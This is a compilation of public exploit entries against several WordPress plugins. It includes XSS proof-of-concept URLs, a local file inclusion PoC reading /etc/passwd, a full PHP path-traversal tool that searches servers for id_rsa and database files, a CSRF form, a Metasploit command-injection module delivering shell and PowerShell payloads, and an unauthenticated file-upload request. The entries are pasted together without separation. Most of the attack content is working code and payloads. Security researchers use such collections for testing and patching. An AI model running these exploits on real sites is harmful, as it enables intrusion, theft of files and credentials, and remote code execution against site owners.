Domain Check is a Wordpress plugin that allows you to see what domains and SSL certificates are coming up for expiration and to quickly locate the coupons, coupon codes, and deals from your favorite sites before renewing.
An authenticated user is able to inject arbitrary Javascript or HTML code to the "Domain Check Profile" interface available in settings page of the plugin, due to incorrect sanitization of user-supplied data and achieve a Reflected Cross-Site Scripting attack against the administrators. The plugin versions prior to 1.0.16 are affected by this vulnerability.
The details of the discovery are given below.
# Steps To Reproduce:
1. Just visit the following page after signing in the administrator panel: http://vulnerable-wordpress-website/wp-admin/admin.php?page=domain-check-profile&domain=hacked.foo<script>alert(1)</script>
2. The XSS will be triggered on the settings page.
# Exploit Title: Wordpress Dharma booking File Inclusion
# Date: 03/22/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage:https://wordpress.org/plugins/dharma-booking/
<https://webcache.googleusercontent.com/search?q=cache:1BjMckAC9HkJ:https://wordpress.org/plugins/dharma-booking/+&cd=2&hl=fr&ct=clnk&gl=fr>Software
Link : https://wordpress.org/plugins/dharma-booking/
# Version: <=2.28.3
# Tested on: WINDOWS/WAMP
dharma-booking/frontend/ajax/gateways/proccess.php's code:
<?php
include_once('../../../../../../wp-config.php');
$settings = get_option('Dharma_Vars');
echo $settings['paymentAccount']. $settings['gatewayid'];
require_once($_GET['gateway'].'.php');
//
POC:
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00
# Exploit Title: WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal
# Date: 19/03/2021
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: https://github.com/A5hleyRich/delightful-downloads
# Version: <=1.6.6
# Tested on: Debian 11
# CVE : CVE-2017-1000170
# PHP version (exploit): 7.3.27
# POC: curl --data "dir=/etc/" http://example.com/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
<?php
$vuln_file = "/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"; // do not change
$agents = ["Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.0; Trident/3.0)",
"Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X; sl-SI) AppleWebKit/531.37.3 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6531.37.3",
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10_6_6 rv:6.0) Gecko/20120629 Firefox/35.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.1)",
"Mozilla/5.0 (iPad; CPU OS 7_2_2 like Mac OS X; sl-SI) AppleWebKit/531.5.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B113 Safari/6531.5.4",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0) AppleWebKit/5321 (KHTML, like Gecko) Chrome/37.0.837.0 Mobile Safari/5321",
"Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/535.12.4 (KHTML, like Gecko) Version/5.1 Safari/535.12.4",
"Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X; en-US) AppleWebKit/531.18.4 (KHTML, like Gecko) Version/4.0.5 Mobile/8B118 Safari/6531.18.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/531.12.4 (KHTML, like Gecko) Version/4.0.3 Safari/531.12.4",
"Mozilla/5.0 (compatible; MSIE 5.0; Windows 98; Win 9x 4.90; Trident/5.0)",
"Opera/8.98 (Windows NT 5.0; en-US) Presto/2.11.268 Version/10.00",
"Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X; sl-SI) AppleWebKit/534.16.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6534.16.2",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100107 Firefox/36.0",
"Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/535.23.6 (KHTML, like Gecko) Version/4.0.2 Safari/535.23.6",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20120805 Firefox/36.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0) Gecko/20130123 Firefox/37.0",
"Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.0; Trident/4.1)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_9 rv:6.0) Gecko/20190226 Firefox/36.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/533.39.1 (KHTML, like Gecko) Version/4.0.3 Safari/533.39.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:4.0) Gecko/20160603 Firefox/37.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5341 (KHTML, like Gecko) Chrome/37.0.831.0 Mobile Safari/5341",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_9 rv:5.0; en-US) AppleWebKit/532.20.3 (KHTML, like Gecko) Version/4.0 Safari/532.20.3",
"Opera/9.74 (X11; Linux x86_64; sl-SI) Presto/2.10.265 Version/12.00",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/5340 (KHTML, like Gecko) Chrome/37.0.813.0 Mobile Safari/5340",
"Opera/9.60 (Windows NT 6.2; en-US) Presto/2.9.333 Version/11.00",
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.862.0 Mobile Safari/5362",
"Opera/9.74 (Windows NT 5.0; en-US) Presto/2.8.188 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.17.1 (KHTML, like Gecko) Version/5.1 Safari/531.17.1",
"Opera/9.93 (Windows CE; sl-SI) Presto/2.12.174 Version/12.00",
"Opera/8.19 (X11; Linux i686; en-US) Presto/2.12.301 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/4.0.4 Safari/532.7.2",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.0)",
"Opera/9.71 (X11; Linux x86_64; en-US) Presto/2.12.270 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2 rv:4.0) Gecko/20130506 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/531.44.7 (KHTML, like Gecko) Version/4.0.4 Safari/531.44.7",
"Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.1.20) Gecko/20110731 Firefox/35.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5341 (KHTML, like Gecko) Chrome/37.0.831.0 Mobile Safari/5341",
"Opera/9.74 (X11; Linux x86_64; sl-SI) Presto/2.10.265 Version/12.00",
"Opera/9.60 (Windows NT 6.2; en-US) Presto/2.9.333 Version/11.00",
"Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X; en-US) AppleWebKit/535.7.5 (KHTML, like Gecko) Version/4.0.5 Mobile/8B115 Safari/6535.7.5",
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.862.0 Mobile Safari/5362",
"Opera/9.74 (Windows NT 5.0; en-US) Presto/2.8.188 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.17.1 (KHTML, like Gecko) Version/5.1 Safari/531.17.1",
"Opera/9.93 (Windows CE; sl-SI) Presto/2.12.174 Version/12.00",
"Mozilla/5.0 (Windows; U; Windows 98; Win 9x 4.90) AppleWebKit/535.13.4 (KHTML, like Gecko) Version/4.0.4 Safari/535.13.4",
"Opera/8.19 (X11; Linux i686; en-US) Presto/2.12.301 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/4.0.4 Safari/532.7.2",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.0)",
"Opera/9.71 (X11; Linux x86_64; en-US) Presto/2.12.270 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2 rv:4.0) Gecko/20130506 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/531.44.7 (KHTML, like Gecko) Version/4.0.4 Safari/531.44.7",
"Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.1.20) Gecko/20110731 Firefox/35.0",
"Opera/8.11 (X11; Linux x86_64; en-US) Presto/2.11.165 Version/11.00",
"Mozilla/5.0 (iPad; CPU OS 7_2_1 like Mac OS X; en-US) AppleWebKit/532.33.6 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6532.33.6",
"Opera/9.71 (X11; Linux x86_64; sl-SI) Presto/2.10.180 Version/11.00",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:5.0) Gecko/20130122 Firefox/36.0",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Trident/3.0)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows 95; Trident/4.1)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.1)",
"Opera/8.33 (X11; Linux x86_64; en-US) Presto/2.8.320 Version/12.00",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20121221 Firefox/36.0",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_9 rv:4.0) Gecko/20200625 Firefox/35.0",
"Mozilla/5.0 (Windows NT 6.0; sl-SI; rv:1.9.0.20) Gecko/20200505 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/532.44.4 (KHTML, like Gecko) Version/5.0 Safari/532.44.4",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_9 rv:3.0) Gecko/20201229 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/531.17.6 (KHTML, like Gecko) Version/4.1 Safari/531.17.6",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/5311 (KHTML, like Gecko) Chrome/38.0.877.0 Mobile Safari/5311",
"Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/531.4.3 (KHTML, like Gecko) Version/5.1 Safari/531.4.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0 rv:4.0) Gecko/20140118 Firefox/35.0",
"Mozilla/5.0 (Windows 95) AppleWebKit/5330 (KHTML, like Gecko) Chrome/36.0.847.0 Mobile Safari/5330",
"Opera/8.39 (Windows 98; sl-SI) Presto/2.9.202 Version/11.00",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5 rv:3.0; en-US) AppleWebKit/534.11.4 (KHTML, like Gecko) Version/5.0 Safari/534.11.4"];
function post_request($url, $data, $random_agent = 0){
global $agents;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array("dir" => $data));
#curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080"); //debug w/ burp
if($random_agent){
curl_setopt($ch, CURLOPT_USERAGENT, $agents[rand(0,count($agents)-1)]);
}
$output = curl_exec($ch);
curl_close($ch);
return $output;
}
function parse_dir($str){ // by raina77ow =)
$contents = array();
$startFrom = $contentStart = $contentEnd = 0;
while (false !== ($contentStart = strpos($str, 'rel="', $startFrom))){
$contentStart += 5;
$contentEnd = strpos($str, '">', $contentStart);
if (false === $contentEnd){
break;
}
$contents[] = substr($str, $contentStart, $contentEnd - $contentStart);
$startFrom = $contentEnd + 2;
}
return $contents;
}
function list_files($url,$path, $recursive=0,$filter){
global $vuln_file;
global $recursive;
global $random_agent;
$exts = "";
$extensions = "";
$files = "";
(count($filter) > 0) ? $has_filter = 1 : $has_filter = 0;
$parsed = parse_dir(post_request($url.$vuln_file, $path, $random_agent)); // array tree
foreach($parsed as $file_or_folder){
if($has_filter){
foreach($filter as $filtered){
if(strpos($file_or_folder, $filtered) !== false){ //if the current file contains any of the filter
echo " ".$file_or_folder."\n";
continue;
}
if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder
if($recursive){ //if recursive flag is set, enter on each folder and do it
list_files($url, $file_or_folder, $recursive, $filter);
}
continue 2; // continue the outermost foreach
}
}
continue; // if has filter, always restart the loop here
}
if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder
if($recursive){ //if recursive flag is set, enter on each folder and do it
list_files($url, $file_or_folder, $recursive, $filter);
}else{
echo " ".$file_or_folder."\n"; //if it's not to be recursive, just print the folder name
}
}else{ //is a file
echo " ".$file_or_folder."\n";
}
continue;
}
}
function alert_user($target,$path, $recursive, $filter){ //scan the root of the server recursivelly can really be a pain
if($path == "/" && $recursive == 1){
echo red(" [i] WARNING: Scanning the root of the webserver recursivelly can
exceed the timeout limit, block your IP or even take down the server.
Are you sure you want to continue? [y/N] ");
$handle = fopen ("php://stdin","r");
$line = fgets($handle);
if(trim(strtoupper($line)) != 'Y'){
echo "\n Aborted. Try running me without the recursion flag\n\n";
exit;
}
fclose($handle);
echo cyan("\n\n Ok, don't say I didn't warn you...\n");
}
list_files($target,$path, $recursive, $filter);
}
############################################################
function green($str){
return "\e[92m".$str."\e[0m";
}
function red($str){
return "\e[91m".$str."\e[0m";
}
function yellow($str){
return "\e[93m".$str."\e[0m";
}
function cyan($str){
return "\e[96m".$str."\e[0m";
}
function banner(){
echo "
_____ _ _ _ _ __ _ _______
| __ \ | (_) | | | | / _| | |__ __|
| | | | ___| |_ __ _| |__ | |_| |_ _ _| | | |_ __ ___ ___
| | | |/ _ \ | |/ _` | _ \| __| _| | | | | | | ´__/ _ \/ _ \
| |__| | __/ | | (_| | | | | |_| | | |_| | | | | | | __/ __/
|_____/ \___|_|_|\__, |_| |_|\__|_| \__,_|_| |_|_| \___|\___|
__/ | ".green("Coder: ").yellow("Nicholas Ferreira")."
|___/ 0x7359
".cyan("Delightful Downloads - Jquery File Tree")."
Unauthenticated Path Traversal exploit ".
red("\n (CVE-2017-1000170)")."
";
}
// ======================= CHECKING =======================
$short_args = "u:h::p:r::f:a::";
$long_args = array("url:","help::","path:","recursive::","filter:","random-agent::");
$options = getopt($short_args, $long_args);
if($argc == 1){
die(banner()." Usage: php xpl_jqueryFileTree.php -u url [-x extensions] [-p path] [-r] [-h] [-a]\n\n Help: -h or --help\n\n");
}
if(isset($options['h']) || isset($options['help'])){
banner();
die( " Usage: php ".$argv[0]." -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a]
-h, --help: Show this message
-u, --url: URL of target
-a, --random-agent: Use random user agents
-f, --filter: Name of files or extensions to search for (separated by comma)
-p, --path: The full path from which the filenames will be read (default: /)
-r, --recursive: Generates the tree recursivelly (be careful)
e.g.: ".cyan($argv[0]." -u victim.com -f .zip,.sql -p /var/www/html/backup/admin/ -r")."
|
\-> This will search for all .zip and .sql files inside victim.com/backup/admin and its subpaths
(You must provide the dot to indicate it's an extension)
".cyan($argv[0]." -u victim.com -f .log,id_rsa -a -r")."
|
\-> This will search for all files named \"id_rsa\" or having the extension
\".log\" within all folders of the server, with random user-agents
".yellow("Tip: use \"php ..... | tee output\" to save the result to an output file")."
");
}
$random_agent = 0;
if(isset($options['a'])){
$random_agent = 1;
}elseif(isset($options['random-agent'])){
$random_agent = 1;
}
$target = "";
if(isset($options['u'])){
$target = $options['u'];
}elseif(isset($options['url'])){
$target = $options['url'];
}
$recursive = 0;
if(isset($options['r'])){
$recursive = 1;
}elseif(isset($options['recursive'])){
$recursive = 1;
}
$path = "/";
if(isset($options['p'])){
$path = $options['p'];
}elseif(isset($options['path'])){
$path = $options['p'];
}
if($path !== "/"){
if(!preg_match("#^\/.*\/$#", $path)){
$path = str_replace("//", "/", "/".$path."/"); // $path must be of the form /<path>/ for this to work, so lets force it
}
}
$extensions = "";
if(isset($options['f'])){
$extensions = $options['f']; //strings
}elseif(isset($options['filter'])){
$extensions = $options['filter']; //string
}
$filter = array();
if($extensions !== ""){
$filter = explode(",", $extensions);
}
// ========================= END CHECKING ==========================
function is_vulnerable($url){
global $vuln_file;
global $random_agent;
global $filter;
echo " [*] Target: ".$url."\n";
if(count($filter) > 0){
echo " [*] Filter: ".implode(", ", $filter)."\n\n";
}
echo cyan(" [i] Checking if the target is vulnerable...\n");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url.$vuln_file);
curl_setopt($ch, CURLOPT_NOBODY, true); // HEAD request to vulnerable file
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if(substr($code,0,1) == 2){ // 2xx
echo yellow(" [i] HTTP response of vulnerable file is 2xx. May be vulnerable!\n");
$post = post_request($url.$vuln_file, "/", $random_agent);
if(preg_match_all("/jqueryfiletree.*(bin|boot|dev|etc|var|usr|windows|users|temp)/", strtolower($post))){
echo green(" [+] Target is vulnerable! Getting file list...\n\n");
return true;
}
echo red(" [-] Target is not vulnerable... =(\n\n");
}else{
echo red(" [-] Could not find a valid vulnerable file. Maybe it doesn't exist,
you don't have permission to read it or it is in another directory.\n");
}
return false;
}
banner();
if(is_vulnerable($target)){
global $filter;
alert_user($target,$path, $recursive, $filter);
echo green("\n [+] Done!\n\n");
}
?>
# Exploit Title: WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF
# Date: 2/10/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/database-backups/
# Version: 1.2.2.6
# Tested on: Windows 10
# CVE: CVE-2021-24174
1. Description:
This plugin allows admins to create and download database backups. A CSRF can create DB backups stored publicly in the uploads directory.
2. Proof of Concept:
<form action="http://localhost/wp-admin/tools.php?page=database-backups" method="post">
<input type="hidden" name="do_backup_manually" value="1">
<input type="submit" class="button button-primary" value="Do backup" autocomplete="off">
</form>
Backups can be accessed by the following URL.
http://localhost/wp-content/uploads/database-backups/
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HTTP::Wordpress
def initialize(info = {})
super(update_info(info,
'Name' => 'WP Database Backup RCE',
'Description' => %q(
There exists a command injection vulnerability in the Wordpress plugin
`wp-database-backup` for versions < 5.2.
For the backup functionality, the plugin generates a `mysqldump` command
to execute. The user can choose specific tables to exclude from the backup
by setting the `wp_db_exclude_table` parameter in a POST request to the
`wp-database-backup` page. The names of the excluded tables are included in
the `mysqldump` command unsanitized. Arbitrary commands injected through the
`wp_db_exclude_table` parameter are executed each time the functionality
for creating a new database backup are run.
Authentication is required to successfully exploit this vulnerability.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Mikey Veenstra / Wordfence', # Vulnerability Discovery
'Shelby Pace' # Metasploit module
],
'References' =>
[
[ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],
],
'Platform' => [ 'win', 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' =>
[
[
'Windows',
{
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ]
}
],
[
'Linux',
{
'Platform' => 'linux',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'CmdStagerFlavor' => 'printf'
}
]
],
'DisclosureDate' => '2019-04-24',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME', [ true, 'Wordpress username', '' ]),
OptString.new('PASSWORD', [ true, 'Wordpress password', '' ]),
OptString.new('TARGETURI', [ true, 'Base path to Wordpress installation', '/' ])
])
end
def check
return CheckCode::Unknown unless wordpress_and_online?
changelog_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-database-backup', 'readme.txt')
res = send_request_cgi(
'method' => 'GET',
'uri' => changelog_uri
)
if res && res.code == 200
version = res.body.match(/=+\s(\d+\.\d+)\.?\d*\s=/)
return CheckCode::Detected unless version && version.length > 1
vprint_status("Version of wp-database-backup detected: #{version[1]}")
return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2')
end
CheckCode::Safe
end
def exploit
cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
fail_with(Failure::NoAccess, 'Unable to log into Wordpress') unless cookie
res = create_exclude_table(cookie)
nonce = get_nonce(res)
create_backup(cookie, nonce)
clear_exclude_table(cookie)
end
def create_exclude_table(cookie)
@exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => @exclude_uri,
'cookie' => cookie,
'vars_get' => { 'page' => 'wp-database-backup' }
)
fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200
print_good('Reached the wp-database-backup settings page')
if datastore['TARGET'] == 1
comm_payload = generate_cmdstager(concat_operator: ' && ', temp: './')
comm_payload = comm_payload.join('&&')
comm_payload = comm_payload.gsub('\'', '')
comm_payload = "; #{comm_payload} ;"
else
comm_payload = " & #{cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true, encode_final_payload: true)} & ::"
end
table_res = send_request_cgi(
'method' => 'POST',
'uri' => @exclude_uri,
'cookie' => cookie,
'vars_post' =>
{
'wpsetting' => 'Save',
'wp_db_exclude_table[wp_comment]' => comm_payload
}
)
fail_with(Failure::UnexpectedReply, 'Failed to submit payload as an excluded table') unless table_res && table_res.code
print_good('Successfully added payload as an excluded table')
res.get_html_document
end
def get_nonce(response)
fail_with(Failure::UnexpectedReply, 'Failed to get a proper response') unless response
div_res = response.at('p[@class="submit"]')
fail_with(Failure::NotFound, 'Failed to find the element containing the nonce') unless div_res
wpnonce = div_res.to_s.match(/_wpnonce=([0-9a-z]*)/)
fail_with(Failure::NotFound, 'Failed to retrieve the wpnonce') unless wpnonce && wpnonce.length > 1
wpnonce[1]
end
def create_backup(cookie, nonce)
first_res = send_request_cgi(
'method' => 'GET',
'uri' => @exclude_uri,
'cookie' => cookie,
'vars_get' =>
{
'page' => 'wp-database-backup',
'_wpnonce' => nonce,
'action' => 'createdbbackup'
}
)
res = send_request_cgi(
'method' => 'GET',
'uri' => @exclude_uri,
'cookie' => cookie,
'vars_get' =>
{
'page' => 'wp-database-backup',
'notification' => 'create'
}
)
fail_with(Failure::UnexpectedReply, 'Failed to create database backup') unless res && res.code == 200 && res.body.include?('Database Backup Created Successfully')
print_good('Successfully created a backup of the database')
end
def clear_exclude_table(cookie)
res = send_request_cgi(
'method' => 'POST',
'uri' => @exclude_uri,
'cookie' => cookie,
'vars_post' =>
{
'wpsetting' => 'Save',
'wp_db_exclude_table[wp_comment]' => 'wp_comment'
}
)
fail_with(Failure::UnexpectedReply, 'Failed to delete the remove the payload from the excluded tables') unless res && res.code == 200
print_good('Successfully deleted the payload from the excluded tables list')
end
end
source: https://www.securityfocus.com/bid/47620/info
The Daily Maui Photo Widget plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Daily Maui Photo Widget plugin 0.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/daily-maui-photo-widget/wp-dailymaui-widget-control.php?title=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
Exploit Title: WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload
Link: https://wordpress.org/plugins/cysteme-finder/
Version: 1.3
Date: August 23rd 2016
Exploit Author: T0w3ntum
Author Website: t0w3ntum.com
### SUMMARY
CYSTEME Finder is an admin file manager plugin for wordpress that fails to check cookie data in the request
to http://server/wp-content/plugins/cysteme-finder/php/connector.php
This allows attackers to upload, download, and browse the remote file system.
### LFI
- Retrieve all data in the root wordpress directory. This will return JSON.
Exploit:
http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress&cmd=open&init=1&tree=1
Reply:
{
"cwd": {
"mime": "directory",
"ts": 1471999484,
"read": 1,
"write": 1,
"size": 0,
"hash": "l1_Lw",
"volumeid": "l1_",
"name": "Fichiers du site",
"date": "Today 20:44",
"locked": 1,
"dirs": 1
},
"options": {
"path": "Fichiers du site",
"url": null,
"tmbUrl": "",
"disabled": [
],
"separator": "\/",
"copyOverwrite": 1,
"archivers": {
"create": [
"application\/x-tar",
"application\/x-gzip",
"application\/x-bzip2"
],
"extract": [
"application\/x-tar",
"application\/x-gzip",
"application\/x-bzip2",
"application\/zip"
]
}
},
"files": [
{
"mime": "directory",
"ts": 1471999484,
"read": 1,
"write": 1,
"size": 0,
"hash": "l1_Lw",
"volumeid": "l1_",
"name": "Fichiers du site",
"date": "Today 20:44",
"locked": 1,
"dirs": 1
},
{
"mime": "text\/plain",
"ts": 1471714510,
"read": 1,
"write": 1,
"size": 813,
"hash": "l1_Lmh0YWNjZXNz",
"name": ".htaccess",
"phash": "l1_Lw",
"date": "20 Aug 2016 13:35"
},
Simply replacing wphome with any other directory path will return file information for that directory.
If you want to download that file, get the hash value for the file and include it in the following request:
Will download /etc/passwd
http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/etc&cmd=file&target=l1_cGFzc3dk&download=1
### File Upload
As with downloading the files, you will need the hash value for the target directory. With the hash value, send a payload similar to the following.
POST /wordpress/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress/&wpurl=http://server HTTP/1.1
Host: http://server
Content-Length: 314
Origin: http://server
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: multipart/form-data; boundary=--------723608748
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
----------723608748
Content-Disposition: form-data; name="cmd"
upload
----------723608748
Content-Disposition: form-data; name="target"
l1_Lw
----------723608748
Content-Disposition: form-data; name="upload[]"; filename="test.php"
Content-Type: text/html
<?php phpinfo(); ?>
----------723608748--
source: https://www.securityfocus.com/bid/54326/info
WordPress custom tables plugin is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
custom tables 3.4.4 is vulnerable; prior versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
# Exploit Title: WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 09/01/2021
# Exploit Author: Swapnil Subhash Bodekar
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/custom-global-variables/#developers
# Version: 1.0.5
# Tested on Windows
How to reproduce vulnerability:
1. Install WordPress 5.6
2. Install and activate Custom Global variables plugin.
3. Navigate to Setting >> Custom Global Variables and enter the data into the user input field.
4. Capture the request into burp suite and append the JavaScript payload which is mentioned below
"><script>(1)</script><"
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.